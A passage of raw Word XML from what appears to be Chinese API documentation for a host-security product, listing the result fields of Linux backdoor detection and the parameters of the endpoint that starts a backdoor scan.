          <w:p w14:paraId="3CC8A137" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77DD9FC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C46BB15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1083D3CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55F39AFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E162005" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D71BC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4450C74E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FACF67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57F007A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D8D4C9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C16DDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A0AC1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F71BBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="44F5E12A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E61DA39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AFD86A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B23E5F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B396C20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1ADA088D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27CBE46C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5406C6BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23035A1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52A4E460" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D5B611F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3986BC40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F0B17B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD56113" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F9E1E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1267EB44" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15A9C56F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D07E2FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229B7EBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425A0468" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20831BAA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37B94F3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B21D88F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7DDA63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432FEC25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="742D0AAD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C90287" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A72D09C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B9A2CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09A759CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E974034" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EFF7CB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5F773B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B6DDFB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312B20D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>后门类型，包含：应用后门，Bootkit，Rootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5ADB17F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B86E6E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315507DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="261B319B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4AC100" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BAABA11" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2232EEB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16FBCA3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5489E950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49C87E86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查功能，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《Linux检查功能字典表》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0BEC1737" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB0DA6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB81635" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0738D935" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF17396" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查说明，恶意进程中为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="425E22A0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4344A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAE03A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54CDF142" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAD4C89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查结果，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《附录1》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C9C4195" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30631B88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>instruct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65240E37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33423DB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F46078C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E7CF155" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="618C9BB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3D8F5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B20095" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05CD4281" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A4312A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="linux后门检测-开始扫描"/>
      <w:bookmarkEnd w:id="160"/>
      <w:r>
        <w:t>Linux后门检测-开始扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2EB900" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux后门检测执行扫描任务的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C2145" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E153FF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/detect/backdoor/linux/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3043AFC9"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225"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="6610"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6941E92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FBB8FAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4983E1FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6381E108" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08A2D13E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FF9FB58" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="209953E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3534B89C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="429AFD88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EFD2179" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:当前账号管理下的全部主机； 1:自定义主机； 2:自定义业务组；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4EBFBC6C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142C3763" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F559153" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B51E7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5F1BF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39722CE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CAC6D34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
